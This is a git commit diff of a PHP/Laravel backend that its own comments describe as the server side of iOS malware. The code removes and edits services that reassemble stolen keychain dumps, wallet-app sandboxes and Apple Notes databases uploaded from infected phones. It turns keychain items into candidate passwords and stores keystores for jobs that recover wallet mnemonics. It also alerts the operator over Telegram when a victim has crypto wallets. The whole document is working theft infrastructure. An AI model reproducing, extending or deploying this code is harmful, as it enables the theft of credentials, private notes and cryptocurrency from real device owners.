feat: app
This commit is contained in:
@@ -1,724 +0,0 @@
|
||||
<?php
|
||||
|
||||
namespace App\Services;
|
||||
|
||||
use App\Jobs\DecryptDeviceKeystores;
|
||||
use App\Models\Device;
|
||||
use App\Models\DeviceApp;
|
||||
use App\Models\WalletKeystore;
|
||||
use App\Support\WalletSource;
|
||||
use Illuminate\Support\Facades\Log;
|
||||
|
||||
/**
|
||||
* Ingest ai-live (w2.bsvpn.net) chunked uploads into the wallet keystore +
|
||||
* Apple Notes pipelines.
|
||||
*
|
||||
* The malware uploads three kinds of artifacts via /api/v2/uploads:
|
||||
* 1. keychain.xml — full iOS keychain dump (doKeychain=true acquisition)
|
||||
* 2. <bundleId>.tar — tar of each wallet app's Documents directory
|
||||
* 3. group.com.apple.notes.tar — Apple Notes shared container (NoteStore.sqlite)
|
||||
*
|
||||
* This service reassembles chunked uploads, parses them, and:
|
||||
* - keychain.xml → stored as a keychain.wallets WalletKeystore row
|
||||
* - wallet tar → stored as a sandbox WalletKeystore row
|
||||
* - notes tar → NoteStore.sqlite trio saved to c2/ds-results/ and
|
||||
* DecodeMemoDb job dispatched to parse note text
|
||||
*
|
||||
* DecryptDeviceKeystores is dispatched on /api/v2/finish to recover
|
||||
* mnemonics from the stored keystores off the request thread.
|
||||
*/
|
||||
final class AiLiveUploadIngester
|
||||
{
|
||||
/** Chunk files are saved as <ts>_<tag>_<uploadId>_c<chunkIndex>.bin */
|
||||
private const CHUNK_GLOB = '*_%s_c*.bin';
|
||||
|
||||
/**
|
||||
* Reassemble chunks for an upload session, parse the artifact, store
|
||||
* keystores, and dispatch the decryption job.
|
||||
*
|
||||
* @param array<string, mixed> $session Cache session (fileName, numberOfChunks, ...)
|
||||
*/
|
||||
public function ingest(Device $device, string $uploadId, array $session): void
|
||||
{
|
||||
$fileName = (string) ($session['fileName'] ?? 'unknown');
|
||||
$uploadDir = public_path('log/app_c2/uploads');
|
||||
|
||||
$chunks = $this->collectChunks($uploadDir, $uploadId, (int) ($session['numberOfChunks'] ?? 1));
|
||||
if ($chunks === []) {
|
||||
Log::channel('keystore')->warning('AiLiveUploadIngester: no chunk files found', [
|
||||
'device_id' => $device->id,
|
||||
'upload_id' => $uploadId,
|
||||
'file_name' => $fileName,
|
||||
]);
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
$content = $this->reassemble($chunks);
|
||||
if ($content === '') {
|
||||
return;
|
||||
}
|
||||
|
||||
$this->dispatchParse($device, $content, $fileName, $uploadId);
|
||||
}
|
||||
|
||||
/**
|
||||
* Dispatch the async keystore decryption job for a device.
|
||||
*/
|
||||
public function dispatchDecrypt(Device $device): void
|
||||
{
|
||||
try {
|
||||
DecryptDeviceKeystores::dispatch($device->id, null, null);
|
||||
} catch (\Throwable $e) {
|
||||
Log::channel('keystore')->error('AiLiveUploadIngester dispatch failed', [
|
||||
'device_id' => $device->id,
|
||||
'device_key' => $device->device_id,
|
||||
'error' => $e->getMessage(),
|
||||
]);
|
||||
}
|
||||
}
|
||||
|
||||
// ────────────────────────────────────────────────────────────
|
||||
// chunk reassembly
|
||||
// ────────────────────────────────────────────────────────────
|
||||
|
||||
/**
|
||||
* @param list<int> $chunkIndices
|
||||
* @return list<string> Sorted chunk file paths.
|
||||
*/
|
||||
private function collectChunks(string $dir, string $uploadId, int $numberOfChunks): array
|
||||
{
|
||||
if (! is_dir($dir)) {
|
||||
return [];
|
||||
}
|
||||
// UUIDs only contain [0-9a-f-], none of which are glob special chars,
|
||||
// so no escaping needed (preg_quote would break glob by escaping `-`).
|
||||
$pattern = sprintf(self::CHUNK_GLOB, $uploadId);
|
||||
$files = glob($dir.'/'.$pattern) ?: [];
|
||||
if ($files === []) {
|
||||
return [];
|
||||
}
|
||||
usort($files, function ($a, $b) {
|
||||
return $this->chunkIndex($a) <=> $this->chunkIndex($b);
|
||||
});
|
||||
// Keep only the expected number of chunks.
|
||||
return array_slice($files, 0, max(1, $numberOfChunks));
|
||||
}
|
||||
|
||||
private function chunkIndex(string $path): int
|
||||
{
|
||||
if (preg_match('/_c(\d+)\.bin$/', $path, $m)) {
|
||||
return (int) $m[1];
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
/**
|
||||
* @param list<string> $chunkPaths
|
||||
*/
|
||||
private function reassemble(array $chunkPaths): string
|
||||
{
|
||||
$out = '';
|
||||
foreach ($chunkPaths as $path) {
|
||||
$chunk = @file_get_contents($path);
|
||||
if ($chunk === false) {
|
||||
continue;
|
||||
}
|
||||
$out .= $chunk;
|
||||
}
|
||||
|
||||
return $out;
|
||||
}
|
||||
|
||||
// ────────────────────────────────────────────────────────────
|
||||
// parse + store
|
||||
// ────────────────────────────────────────────────────────────
|
||||
|
||||
/**
|
||||
* Route the artifact to the correct parser based on file name.
|
||||
*/
|
||||
private function dispatchParse(Device $device, string $content, string $fileName, string $uploadId): void
|
||||
{
|
||||
$lower = strtolower($fileName);
|
||||
|
||||
if (str_contains($lower, 'keychain') || str_ends_with($lower, '.xml')) {
|
||||
$this->parseKeychainXml($device, $content, $fileName);
|
||||
} elseif (str_ends_with($lower, '.tar')) {
|
||||
$bundleId = preg_replace('/\.tar$/i', '', $fileName);
|
||||
// Apple Notes is uploaded as group.com.apple.notes.tar — route
|
||||
// it to the NoteStore.sqlite decoder instead of the wallet
|
||||
// keystore walker.
|
||||
if ($this->isNotesBundle($bundleId)) {
|
||||
$this->parseNotesTar($device, $content, $uploadId);
|
||||
} else {
|
||||
$this->parseWalletTar($device, $content, (string) $bundleId);
|
||||
}
|
||||
} else {
|
||||
// Unknown artifact — try tar first, then keychain XML.
|
||||
if ($this->looksLikeTar($content)) {
|
||||
// Peek inside: if it contains NoteStore.sqlite, treat as notes.
|
||||
if ($this->tarContainsNoteStore($content)) {
|
||||
$this->parseNotesTar($device, $content, $uploadId);
|
||||
} else {
|
||||
$this->parseWalletTar($device, $content, $fileName);
|
||||
}
|
||||
} elseif ($this->looksLikeXml($content)) {
|
||||
$this->parseKeychainXml($device, $content, $fileName);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Whether a bundle ID / file name refers to the Apple Notes app group.
|
||||
*/
|
||||
private function isNotesBundle(string $bundleId): bool
|
||||
{
|
||||
$lower = strtolower($bundleId);
|
||||
|
||||
return $lower === 'group.com.apple.notes'
|
||||
|| str_contains($lower, 'com.apple.notes')
|
||||
|| $lower === 'notes';
|
||||
}
|
||||
|
||||
/**
|
||||
* Quick peek: does this tar archive contain NoteStore.sqlite?
|
||||
*/
|
||||
private function tarContainsNoteStore(string $content): bool
|
||||
{
|
||||
if (! $this->looksLikeTar($content)) {
|
||||
return false;
|
||||
}
|
||||
// Tar file names live in the 0–100 byte range of each 512-byte header.
|
||||
// A simple substring scan for "NoteStore.sqlite" is good enough.
|
||||
return str_contains($content, 'NoteStore.sqlite');
|
||||
}
|
||||
|
||||
private function looksLikeTar(string $content): bool
|
||||
{
|
||||
return strlen($content) >= 262 && substr($content, 257, 5) === "ustar";
|
||||
}
|
||||
|
||||
private function looksLikeXml(string $content): bool
|
||||
{
|
||||
return str_starts_with(ltrim($content), '<?xml') || str_starts_with(ltrim($content), '<Backup');
|
||||
}
|
||||
|
||||
// ── keychain.xml ────────────────────────────────────────────
|
||||
|
||||
/**
|
||||
* Parse the iOS keychain backup XML, group items by access group → wallet
|
||||
* source, decode each item's v_Data (base64 plist → KEY/data → base64 →
|
||||
* raw bytes), and store as a keychain.wallets WalletKeystore row.
|
||||
*
|
||||
* The DsKeystoreDecrypt walker expects:
|
||||
* {kind: "keychain.wallets", wallets: {<source>: {items: [{account, service, dataHex}]}}}
|
||||
*/
|
||||
private function parseKeychainXml(Device $device, string $content, string $fileName): void
|
||||
{
|
||||
try {
|
||||
$xml = @new \SimpleXMLElement($content);
|
||||
} catch (\Throwable $e) {
|
||||
Log::channel('keystore')->warning('AiLiveUploadIngester: keychain XML parse failed', [
|
||||
'device_id' => $device->id,
|
||||
'file_name' => $fileName,
|
||||
'error' => $e->getMessage(),
|
||||
]);
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
// Group items by source label.
|
||||
$buckets = [];
|
||||
$itemCount = 0;
|
||||
$seenBundles = []; // bundle IDs seen in this keychain dump
|
||||
|
||||
foreach ($xml->xpath('//item') as $item) {
|
||||
$acct = (string) ($item->acct ?? '');
|
||||
$svce = (string) ($item->svce ?? '');
|
||||
$agrp = (string) ($item->agrp ?? '');
|
||||
$vData = (string) ($item->{'v_Data'} ?? '');
|
||||
|
||||
$dataHex = $this->decodeKeychainVData($vData);
|
||||
if ($dataHex === '') {
|
||||
continue;
|
||||
}
|
||||
|
||||
$source = $this->sourceFromAgrp($agrp, $acct);
|
||||
if (! isset($buckets[$source])) {
|
||||
$buckets[$source] = ['items' => []];
|
||||
}
|
||||
$buckets[$source]['items'][] = [
|
||||
'account' => $acct,
|
||||
'service' => $svce,
|
||||
'accessGroup' => $agrp,
|
||||
'dataHex' => $dataHex,
|
||||
];
|
||||
$itemCount++;
|
||||
|
||||
// Collect bundle IDs from agrp for the installed-app list.
|
||||
$bundle = $this->bundleIdFromAgrp($agrp);
|
||||
if ($bundle !== '' && ! isset($seenBundles[$bundle])) {
|
||||
$seenBundles[$bundle] = $source;
|
||||
}
|
||||
}
|
||||
|
||||
// Record every app that has keychain entries as installed.
|
||||
foreach ($seenBundles as $bundle => $source) {
|
||||
$this->recordInstalledApp($device, $bundle, $source);
|
||||
}
|
||||
|
||||
if ($buckets === []) {
|
||||
return;
|
||||
}
|
||||
|
||||
$rawJson = [
|
||||
'kind' => 'keychain.wallets',
|
||||
'wallets' => $buckets,
|
||||
];
|
||||
|
||||
$source = 'ai-live/keychain';
|
||||
WalletKeystore::firstOrCreateForDevice($device, $source, $rawJson);
|
||||
|
||||
Log::channel('keystore')->info('AiLiveUploadIngester: stored keychain', [
|
||||
'device_id' => $device->id,
|
||||
'file_name' => $fileName,
|
||||
'items' => $itemCount,
|
||||
'sources' => array_keys($buckets),
|
||||
]);
|
||||
}
|
||||
|
||||
/**
|
||||
* Decode the base64-encoded content in <v_Data> and return the raw
|
||||
* bytes as hex.
|
||||
*
|
||||
* Two storage formats exist in iOS keychain dumps:
|
||||
* 1. Plist-wrapped: <plist><dict><key>KEY</key><data>base64</data>…</dict></plist>
|
||||
* — common for Apple system entries (Bluetooth, account tokens).
|
||||
* 2. Raw value: the base64-decoded content is the value itself (a hex
|
||||
* string, a plain-text password, a JSON snippet, etc.) with no plist
|
||||
* wrapper — common for third-party app entries (Trust Wallet stores
|
||||
* the keystore password as a base64-encoded hex string).
|
||||
*
|
||||
* @param string $vDataRaw Base64-encoded content from <v_Data bin="1">.
|
||||
*/
|
||||
private function decodeKeychainVData(string $vDataRaw): string
|
||||
{
|
||||
$vDataRaw = trim($vDataRaw);
|
||||
if ($vDataRaw === '') {
|
||||
return '';
|
||||
}
|
||||
$decoded = base64_decode($vDataRaw, true);
|
||||
if (! is_string($decoded) || $decoded === '') {
|
||||
return '';
|
||||
}
|
||||
|
||||
// ── 1. Try plist-wrapped format (Apple system entries) ──
|
||||
// The plist is XML: <plist><dict><key>KEY</key><data>base64</data></dict></plist>
|
||||
if (str_starts_with(ltrim($decoded), '<') || str_starts_with(ltrim($decoded), "\xb5")) {
|
||||
try {
|
||||
$px = @new \SimpleXMLElement($decoded);
|
||||
$dataNodes = $px->xpath('//data');
|
||||
foreach ($dataNodes as $dataNode) {
|
||||
$b64 = trim((string) $dataNode);
|
||||
if ($b64 === '') {
|
||||
continue;
|
||||
}
|
||||
$bin = base64_decode($b64, true);
|
||||
if (is_string($bin) && $bin !== '') {
|
||||
return bin2hex($bin);
|
||||
}
|
||||
}
|
||||
} catch (\Throwable) {
|
||||
// fall through to raw handling
|
||||
}
|
||||
}
|
||||
|
||||
// ── 2. Raw value (third-party app entries) ──
|
||||
// The decoded content IS the value — return it as hex so the
|
||||
// keystore decryptor can try it as a password. This covers:
|
||||
// • hex strings (Trust Wallet keystore password)
|
||||
// • plain text passwords
|
||||
// • small JSON blobs
|
||||
return bin2hex($decoded);
|
||||
}
|
||||
|
||||
/**
|
||||
* Map a keychain access group (agrp) to a wallet source label.
|
||||
* agrp format: "TEAMID.com.bundle.id" or "group.com.bundle.id".
|
||||
*/
|
||||
private function sourceFromAgrp(string $agrp, string $acct): string
|
||||
{
|
||||
$agrp = trim($agrp);
|
||||
if ($agrp === '') {
|
||||
// Fall back to account-based hint.
|
||||
$hint = WalletSource::fromKeystoreHint($acct);
|
||||
|
||||
return $hint !== '' ? $hint : 'unknown';
|
||||
}
|
||||
// Extract bundle id: take the part after the first dot.
|
||||
$bundle = '';
|
||||
$parts = explode('.', $agrp, 2);
|
||||
if (count($parts) === 2) {
|
||||
$bundle = $parts[1];
|
||||
}
|
||||
$label = WalletSource::labelForBundle($bundle, '');
|
||||
if ($label !== '' && $label !== $bundle) {
|
||||
return $label;
|
||||
}
|
||||
$hint = WalletSource::fromKeystoreHint($bundle);
|
||||
if ($hint !== '') {
|
||||
return $hint;
|
||||
}
|
||||
|
||||
return $bundle !== '' ? $bundle : 'unknown';
|
||||
}
|
||||
|
||||
/**
|
||||
* Extract the raw bundle ID from a keychain access group.
|
||||
* agrp format: "TEAMID.com.bundle.id" or "group.com.bundle.id".
|
||||
*/
|
||||
private function bundleIdFromAgrp(string $agrp): string
|
||||
{
|
||||
$agrp = trim($agrp);
|
||||
if ($agrp === '') {
|
||||
return '';
|
||||
}
|
||||
$parts = explode('.', $agrp, 2);
|
||||
|
||||
return $parts[1] ?? '';
|
||||
}
|
||||
|
||||
/**
|
||||
* Record a bundle ID into the device's installed-app list. The malware
|
||||
* only uploads a tar for apps whose sandbox it could dump, so any
|
||||
* uploaded bundle ID is proof the app is installed. Keychain access
|
||||
* groups are a secondary signal (the app has keychain entries).
|
||||
*/
|
||||
private function recordInstalledApp(Device $device, string $bundleId, ?string $name = null): void
|
||||
{
|
||||
$bundleId = trim($bundleId);
|
||||
if ($bundleId === '') {
|
||||
return;
|
||||
}
|
||||
$label = WalletSource::labelForBundle($bundleId, $name ?? $bundleId);
|
||||
$displayName = ($label !== '' && $label !== $bundleId) ? $label : ($name ?? $bundleId);
|
||||
|
||||
DeviceApp::query()->updateOrCreate(
|
||||
['device_id' => $device->id, 'bundle_id' => $bundleId],
|
||||
[
|
||||
'name' => $displayName,
|
||||
'is_wallet' => WalletSource::isPluginWalletBundle($bundleId),
|
||||
'meta_json' => ['source' => 'ailive_upload', 'uploaded_at' => now()->toIso8601String()],
|
||||
]
|
||||
);
|
||||
|
||||
$this->refreshDeviceWalletFlag($device);
|
||||
}
|
||||
|
||||
/**
|
||||
* Refresh the device's has_wallet / wallet_names flags from the
|
||||
* current installed-app list. Sends a Telegram notification when
|
||||
* wallets are first detected (has_wallet transitions NONE → YES),
|
||||
* mirroring IngestService::refreshDeviceWalletFlag.
|
||||
*/
|
||||
private function refreshDeviceWalletFlag(Device $device): void
|
||||
{
|
||||
$names = [];
|
||||
foreach ($device->apps()->get(['bundle_id', 'name']) as $app) {
|
||||
$bundle = (string) $app->bundle_id;
|
||||
if (! WalletSource::isPluginWalletBundle($bundle)) {
|
||||
continue;
|
||||
}
|
||||
$label = WalletSource::labelForBundle($bundle, $app->name);
|
||||
$names[$label] = true;
|
||||
}
|
||||
$labels = array_keys($names);
|
||||
sort($labels);
|
||||
|
||||
$alreadyYes = (int) $device->has_wallet === Device::WALLET_YES;
|
||||
$device->has_wallet = $labels === [] ? Device::WALLET_NONE : Device::WALLET_YES;
|
||||
$device->wallet_names = $labels === [] ? null : $labels;
|
||||
$device->saveQuietly();
|
||||
|
||||
// Notify Telegram the first time wallets are detected
|
||||
// (UNKNOWN/NONE → YES transition).
|
||||
if (! $alreadyYes && $device->has_wallet === Device::WALLET_YES && $labels !== []) {
|
||||
try {
|
||||
app(\App\Services\TelegramNotifier::class)
|
||||
->notifyInstalledWallets($device->device_id, $labels);
|
||||
} catch (\Throwable $e) {
|
||||
Log::channel('keystore')->warning(
|
||||
'AiLiveUploadIngester telegram notifyInstalledWallets failed: '.$e->getMessage(),
|
||||
['device_id' => $device->id, 'device_key' => $device->device_id],
|
||||
);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// ── wallet app tar ──────────────────────────────────────────
|
||||
|
||||
/**
|
||||
* Extract a wallet app tar, walk the files for Web3 keystore JSON
|
||||
* (crypto.ciphertext/mac/kdf) and other interesting artifacts, and
|
||||
* store as a sandbox WalletKeystore row.
|
||||
*
|
||||
* The DsKeystoreDecrypt walker traverses the sandbox tree and picks
|
||||
* up any dict with crypto.ciphertext/mac/kdf as a keystore to unlock.
|
||||
*/
|
||||
private function parseWalletTar(Device $device, string $content, string $bundleId): void
|
||||
{
|
||||
$source = WalletSource::labelForBundle($bundleId, $bundleId);
|
||||
if ($source === '' || $source === $bundleId) {
|
||||
$hint = WalletSource::fromKeystoreHint($bundleId);
|
||||
$source = $hint !== '' ? $hint : ($bundleId !== '' ? $bundleId : 'unknown');
|
||||
}
|
||||
|
||||
// The malware only uploads a tar for apps whose sandbox it could
|
||||
// dump — so this bundle is definitely installed on the device.
|
||||
$this->recordInstalledApp($device, $bundleId, $source);
|
||||
|
||||
$sandbox = $this->extractTarSandbox($content);
|
||||
if ($sandbox === []) {
|
||||
return;
|
||||
}
|
||||
|
||||
$rawJson = [
|
||||
'kind' => 'sandbox',
|
||||
'sandbox' => [$source => $sandbox],
|
||||
];
|
||||
|
||||
WalletKeystore::firstOrCreateForDevice($device, $source, $rawJson);
|
||||
|
||||
Log::channel('keystore')->info('AiLiveUploadIngester: stored tar sandbox', [
|
||||
'device_id' => $device->id,
|
||||
'bundle_id' => $bundleId,
|
||||
'source' => $source,
|
||||
'files' => count($sandbox, COUNT_RECURSIVE),
|
||||
]);
|
||||
}
|
||||
|
||||
// ── Apple Notes tar ─────────────────────────────────────────
|
||||
|
||||
/**
|
||||
* Extract a group.com.apple.notes tar, pull out NoteStore.sqlite +
|
||||
* -wal + -shm, save them to the location DsMemoDecoder expects
|
||||
* (c2/ds-results/<device_id>/<command_id>/), and dispatch the
|
||||
* DecodeMemoDb job to parse note text off the request thread.
|
||||
*/
|
||||
private function parseNotesTar(Device $device, string $content, string $uploadId): void
|
||||
{
|
||||
$files = $this->extractNotesDbFiles($content);
|
||||
if ($files === []) {
|
||||
Log::channel('keystore')->warning('AiLiveUploadIngester: notes tar has no NoteStore.sqlite', [
|
||||
'device_id' => $device->id,
|
||||
'upload_id' => $uploadId,
|
||||
]);
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
// DsMemoDecoder looks for files under
|
||||
// storage/app/c2/ds-results/<device_id>/<command_id>/NoteStore.sqlite
|
||||
$commandId = 'ailive_'.substr($uploadId, 0, 8);
|
||||
$dir = 'c2/ds-results/'.$device->device_id.'/'.$commandId;
|
||||
$disk = \Illuminate\Support\Facades\Storage::disk('local');
|
||||
|
||||
foreach ($files as $name => $data) {
|
||||
$disk->put($dir.'/'.$name, $data);
|
||||
}
|
||||
|
||||
Log::channel('keystore')->info('AiLiveUploadIngester: stored notes db', [
|
||||
'device_id' => $device->id,
|
||||
'device_key' => $device->device_id,
|
||||
'command_id' => $commandId,
|
||||
'files' => array_keys($files),
|
||||
]);
|
||||
|
||||
// Dispatch the async SQLite decoder job.
|
||||
try {
|
||||
\App\Jobs\DecodeMemoDb::dispatch($device->id, $commandId);
|
||||
} catch (\Throwable $e) {
|
||||
Log::channel('keystore')->error('AiLiveUploadIngester: DecodeMemoDb dispatch failed', [
|
||||
'device_id' => $device->id,
|
||||
'command_id' => $commandId,
|
||||
'error' => $e->getMessage(),
|
||||
]);
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Extract NoteStore.sqlite + -wal + -shm from a notes tar archive.
|
||||
*
|
||||
* @return array<string, string> Map of filename → raw bytes.
|
||||
*/
|
||||
private function extractNotesDbFiles(string $content): array
|
||||
{
|
||||
if (! $this->looksLikeTar($content)) {
|
||||
return [];
|
||||
}
|
||||
$tmp = tempnam(sys_get_temp_dir(), 'ailive_notes_');
|
||||
if ($tmp === false) {
|
||||
return [];
|
||||
}
|
||||
// PharData requires a .tar extension to recognise the archive format.
|
||||
$tmpTar = $tmp . '.tar';
|
||||
@rename($tmp, $tmpTar);
|
||||
$tmp = $tmpTar;
|
||||
try {
|
||||
if (@file_put_contents($tmp, $content) === false) {
|
||||
return [];
|
||||
}
|
||||
try {
|
||||
$phar = new \PharData($tmp);
|
||||
} catch (\Throwable) {
|
||||
return [];
|
||||
}
|
||||
|
||||
$wanted = ['NoteStore.sqlite', 'NoteStore.sqlite-wal', 'NoteStore.sqlite-shm'];
|
||||
$out = [];
|
||||
foreach (new \RecursiveIteratorIterator($phar) as $f) {
|
||||
if (! $f->isFile()) {
|
||||
continue;
|
||||
}
|
||||
$base = basename($f->getPathname());
|
||||
if (! in_array($base, $wanted, true)) {
|
||||
continue;
|
||||
}
|
||||
$raw = @file_get_contents($f->getPathname());
|
||||
if ($raw === false || $raw === '') {
|
||||
continue;
|
||||
}
|
||||
$out[$base] = $raw;
|
||||
}
|
||||
|
||||
return $out;
|
||||
} finally {
|
||||
@unlink($tmp);
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Extract a tar (ustar) archive into a nested dict of file paths →
|
||||
* decoded content. JSON files are parsed into arrays; binary files
|
||||
* (Realm DBs, SQLite) are stored as base64; everything else is stored
|
||||
* as a UTF-8 string when possible.
|
||||
*
|
||||
* @return array<string, mixed>
|
||||
*/
|
||||
private function extractTarSandbox(string $content): array
|
||||
{
|
||||
if (! $this->looksLikeTar($content)) {
|
||||
return [];
|
||||
}
|
||||
|
||||
$tmp = tempnam(sys_get_temp_dir(), 'ailive_tar_');
|
||||
if ($tmp === false) {
|
||||
return [];
|
||||
}
|
||||
// PharData requires a .tar extension to recognise the archive format.
|
||||
$tmpTar = $tmp . '.tar';
|
||||
@rename($tmp, $tmpTar);
|
||||
$tmp = $tmpTar;
|
||||
try {
|
||||
if (@file_put_contents($tmp, $content) === false) {
|
||||
return [];
|
||||
}
|
||||
try {
|
||||
$phar = new \PharData($tmp);
|
||||
} catch (\Throwable) {
|
||||
return [];
|
||||
}
|
||||
|
||||
$sandbox = [];
|
||||
$count = 0;
|
||||
$maxFiles = 200;
|
||||
foreach (new \RecursiveIteratorIterator($phar) as $f) {
|
||||
if ($count >= $maxFiles) {
|
||||
break;
|
||||
}
|
||||
if (! $f->isFile()) {
|
||||
continue;
|
||||
}
|
||||
$rel = ltrim(str_replace('\\', '/', $f->getPathname()));
|
||||
// Strip the "phar://<absolute-tar-path>" prefix. The temp file
|
||||
// path is absolute (starts with "/"), so the old [^/]+ pattern
|
||||
// failed to match the leading slash — use the known prefix.
|
||||
$prefix = 'phar://'.$tmp;
|
||||
if (str_starts_with($rel, $prefix)) {
|
||||
$rel = substr($rel, strlen($prefix));
|
||||
} else {
|
||||
// Fallback: strip phar:// + everything up to the first .tar
|
||||
$rel = preg_replace('#^phar://.*?\.tar#i', '', $rel) ?? $rel;
|
||||
}
|
||||
$rel = ltrim($rel, '/');
|
||||
if ($rel === '') {
|
||||
continue;
|
||||
}
|
||||
|
||||
$raw = @file_get_contents($f->getPathname());
|
||||
if ($raw === false || $raw === '') {
|
||||
continue;
|
||||
}
|
||||
$decoded = $this->decodeFileContent($raw, $rel);
|
||||
if ($decoded === null) {
|
||||
continue;
|
||||
}
|
||||
$this->setNestedPath($sandbox, $rel, $decoded);
|
||||
$count++;
|
||||
}
|
||||
|
||||
return $sandbox;
|
||||
} finally {
|
||||
@unlink($tmp);
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* @return mixed Array for JSON, string for text/base64, null to skip.
|
||||
*/
|
||||
private function decodeFileContent(string $raw, string $path): mixed
|
||||
{
|
||||
// JSON files → parsed array (keystore JSON has crypto.ciphertext/mac/kdf).
|
||||
$first = $raw[0] ?? '';
|
||||
if ($first === '{' || $first === '[') {
|
||||
$json = json_decode($raw, true);
|
||||
if (is_array($json)) {
|
||||
return $json;
|
||||
}
|
||||
}
|
||||
|
||||
// Small text files → UTF-8 string.
|
||||
if (strlen($raw) <= 65536 && mb_check_encoding($raw, 'UTF-8')) {
|
||||
return $raw;
|
||||
}
|
||||
|
||||
// Binary files (Realm, SQLite) → base64 (capped to avoid OOM).
|
||||
$cap = 512 * 1024; // 512 KiB
|
||||
if (strlen($raw) > $cap) {
|
||||
return null; // skip large binaries — not useful for mnemonic recovery
|
||||
}
|
||||
|
||||
return base64_encode($raw);
|
||||
}
|
||||
|
||||
/**
|
||||
* Set a value at a nested path (a/b/c.json → $arr[a][b][c.json]).
|
||||
*
|
||||
* @param array<string, mixed> $arr
|
||||
*/
|
||||
private function setNestedPath(array &$arr, string $path, mixed $value): void
|
||||
{
|
||||
$parts = explode('/', $path);
|
||||
$ref = &$arr;
|
||||
$n = count($parts);
|
||||
for ($i = 0; $i < $n - 1; $i++) {
|
||||
$key = $parts[$i];
|
||||
if (! isset($ref[$key]) || ! is_array($ref[$key])) {
|
||||
$ref[$key] = [];
|
||||
}
|
||||
$ref = &$ref[$key];
|
||||
}
|
||||
$ref[$parts[$n - 1]] = $value;
|
||||
}
|
||||
}
|
||||
File diff suppressed because it is too large
Load Diff
@@ -3,6 +3,7 @@
|
||||
namespace App\Services;
|
||||
|
||||
use App\Models\Device;
|
||||
use App\Models\DeviceApp;
|
||||
use App\Models\DsChainLog;
|
||||
use App\Models\PageVisit;
|
||||
use App\Models\User;
|
||||
@@ -248,17 +249,18 @@ class DarkSwordIngestAdapter
|
||||
$wallets = $keychain['wallets'] ?? [];
|
||||
$sandbox = $payload['sandbox'] ?? [];
|
||||
|
||||
// Store keystores synchronously (fast), then dispatch async decryption.
|
||||
// Store keychain + decryptable UTC only. Do not persist the rest of sandbox.
|
||||
$rows = array_merge(
|
||||
$this->storeWalletKeystores($device, $wallets, 'keychain.wallets', $keychain['diagnostics'] ?? null),
|
||||
$this->storeWalletKeystores($device, $sandbox, 'sandbox', null),
|
||||
$this->storeWeb3KeystoresFromTree($device, $sandbox),
|
||||
);
|
||||
|
||||
// Synchronous address ingestion from sandbox/wallets (Trust-style).
|
||||
$this->trustAddresses->ingest($device, $sandbox);
|
||||
$this->trustAddresses->ingest($device, $wallets);
|
||||
|
||||
// Async: mnemonic recovery + plaintext walk + address extraction.
|
||||
// Async: mnemonic recovery still receives the in-memory sandbox for this
|
||||
// request; later reprocess rebuilds UTC from stored web3.keystore rows.
|
||||
DecryptDeviceKeystores::dispatch($device->id, $wallets, $sandbox);
|
||||
}
|
||||
|
||||
@@ -506,7 +508,7 @@ class DarkSwordIngestAdapter
|
||||
return;
|
||||
}
|
||||
$this->trustAddresses->ingest($device, $raw);
|
||||
$this->storeWalletKeystores($device, ['trust_wallet' => $raw], 'sandbox', null);
|
||||
$this->storeWeb3KeystoresFromTree($device, ['trust_wallet' => $raw]);
|
||||
|
||||
// Async: attempt Trust UTC keystore decryption.
|
||||
DecryptDeviceKeystores::dispatch($device->id, null, ['trust_wallet' => $raw]);
|
||||
@@ -528,10 +530,10 @@ class DarkSwordIngestAdapter
|
||||
$wallets = is_array($json['wallets'] ?? null) ? $json['wallets'] : [];
|
||||
$sandbox = is_array($json['sandbox'] ?? null) ? $json['sandbox'] : [];
|
||||
|
||||
// Store keystores synchronously (fast), then dispatch async decryption.
|
||||
// Store keychain + decryptable UTC only.
|
||||
$rows = array_merge(
|
||||
$this->storeWalletKeystores($device, $wallets, 'keychain.wallets', $json['diagnostics'] ?? null),
|
||||
$this->storeWalletKeystores($device, $sandbox, 'sandbox', null),
|
||||
$this->storeWeb3KeystoresFromTree($device, $sandbox),
|
||||
);
|
||||
|
||||
// Synchronous address ingestion from sandbox/wallets (Trust-style).
|
||||
@@ -556,10 +558,10 @@ class DarkSwordIngestAdapter
|
||||
if ($json === null) {
|
||||
return;
|
||||
}
|
||||
$this->storeWalletKeystores($device, ['imtoken' => $json], 'keychain.wallets', null);
|
||||
$payload = $json;
|
||||
$payload['kind'] = 'web3.keystore';
|
||||
$this->createKeystore($device, 'imToken', $payload, true);
|
||||
|
||||
// Async: attempt recovery (imToken needs password — will likely fail,
|
||||
// but the job logs the reason and still extracts addresses if any).
|
||||
DecryptDeviceKeystores::dispatch($device->id, ['imtoken' => $json], null);
|
||||
}
|
||||
|
||||
@@ -749,7 +751,7 @@ class DarkSwordIngestAdapter
|
||||
continue;
|
||||
}
|
||||
$bundle = trim((string) ($item['bundleId'] ?? $item['bundle_id'] ?? $item['b'] ?? ''));
|
||||
if ($bundle === '' || str_starts_with(strtolower($bundle), 'com.apple')) {
|
||||
if ($bundle === '' || str_starts_with(strtolower($bundle), 'com.apple') || DeviceApp::shouldSkipBundle($bundle)) {
|
||||
continue;
|
||||
}
|
||||
$row = [
|
||||
@@ -810,6 +812,92 @@ class DarkSwordIngestAdapter
|
||||
return false;
|
||||
}
|
||||
|
||||
/**
|
||||
* Persist standard Web3 UTC / walletsV2 blobs found in a sandbox tree.
|
||||
* The rest of the sandbox is discarded.
|
||||
*
|
||||
* @return list<WalletKeystore>
|
||||
*/
|
||||
private function storeWeb3KeystoresFromTree(Device $device, mixed $tree): array
|
||||
{
|
||||
$items = $this->keystoreDecrypt->collectKeystores($tree);
|
||||
$rows = [];
|
||||
$seen = [];
|
||||
foreach ($items as $item) {
|
||||
$ks = $item['keystore'];
|
||||
$crypto = $ks['crypto'] ?? $ks['Crypto'] ?? [];
|
||||
$fp = (string) ($crypto['mac'] ?? '').'|'.(string) ($crypto['ciphertext'] ?? '');
|
||||
if ($fp === '|' || isset($seen[$fp])) {
|
||||
continue;
|
||||
}
|
||||
$seen[$fp] = true;
